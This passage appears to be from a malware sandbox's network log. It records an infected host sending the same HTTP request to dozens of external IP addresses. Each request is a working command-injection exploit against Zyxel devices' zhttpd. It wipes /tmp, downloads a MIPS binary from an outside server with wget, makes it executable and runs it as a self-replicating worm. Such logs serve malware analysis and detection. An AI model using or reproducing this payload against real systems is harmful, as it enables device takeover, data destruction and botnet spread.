                                        Mar 31, 2024 09:22:34.756373882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8486192.168.2.233578470.85.131.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756417036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8487192.168.2.233766497.191.214.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756489038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8488192.168.2.235351688.90.66.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756550074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8489192.168.2.2345826195.15.73.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756625891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8490192.168.2.2356658198.55.69.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756659031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8491192.168.2.2333328185.194.48.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756710052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8492192.168.2.2344438105.34.151.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756763935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8493192.168.2.2342810145.3.202.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756824017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8494192.168.2.2357306167.230.83.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756861925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8495192.168.2.235457438.248.21.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756943941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8496192.168.2.2336708210.31.6.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756983042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8497192.168.2.2341298171.63.203.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757035017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8498192.168.2.234368665.13.88.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757082939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8499192.168.2.234743657.208.77.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757131100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8500192.168.2.2339096208.17.55.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757184029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8501192.168.2.234542480.15.220.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757219076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8502192.168.2.236032059.73.205.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757276058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8503192.168.2.235244478.170.152.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757317066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8504192.168.2.23374884.99.47.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757378101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8505192.168.2.2357130174.120.116.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757425070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8506192.168.2.233845038.226.80.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757476091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8507192.168.2.235957452.158.104.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757514000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8508192.168.2.233965892.184.168.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757560968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8509192.168.2.2343848147.19.66.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757612944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8510192.168.2.233596688.21.107.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757680893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8511192.168.2.235505852.3.145.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757728100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8512192.168.2.2335902178.26.188.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757778883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8513192.168.2.233804612.92.242.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757822037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8514192.168.2.234113672.113.93.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757874966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8515192.168.2.2348356208.73.57.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757913113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8516192.168.2.2340234124.146.155.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.757977962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8517192.168.2.2352182150.97.141.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758021116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8518192.168.2.23586064.209.218.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758060932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8519192.168.2.234325899.164.223.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758147001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8520192.168.2.2351330125.225.157.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758197069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8521192.168.2.2359768188.49.53.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758241892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8522192.168.2.2354688210.137.71.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758290052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8523192.168.2.236045469.131.59.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758325100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8524192.168.2.2357258117.246.152.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758368015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8525192.168.2.2337260182.9.235.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758420944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8526192.168.2.235027892.242.96.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758469105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8527192.168.2.2349792110.220.90.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758531094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8528192.168.2.235249245.61.241.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758578062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8529192.168.2.233691097.210.165.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758608103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8530192.168.2.2349938119.196.117.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758683920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8531192.168.2.2360030148.238.95.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758706093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8532192.168.2.2343660171.201.162.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758774042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8533192.168.2.233407245.52.255.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758816957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8534192.168.2.2346080174.65.204.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758856058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8535192.168.2.233399871.79.86.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758896112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8536192.168.2.2344084114.221.105.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.758982897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8537192.168.2.2350524213.144.59.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759030104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8538192.168.2.234918461.170.175.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759083986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8539192.168.2.2345484146.25.175.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759138107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8540192.168.2.2337656123.162.107.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759186029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8541192.168.2.233603435.19.95.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759227037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8542192.168.2.2360020200.239.176.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759291887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8543192.168.2.234782263.3.223.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759335041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8544192.168.2.236032613.96.23.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759393930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8545192.168.2.233305052.189.0.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759454012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8546192.168.2.2336680104.155.119.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759504080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8547192.168.2.2355702103.104.83.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759587049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8548192.168.2.233645661.47.220.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759628057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8549192.168.2.2360588189.30.210.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759677887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8550192.168.2.2334512192.224.230.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759720087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8551192.168.2.236027218.183.121.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759768009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8552192.168.2.2340618150.241.100.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759819984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8553192.168.2.234240238.184.2.249443
                                        TimestampBytes transferredDirectionData
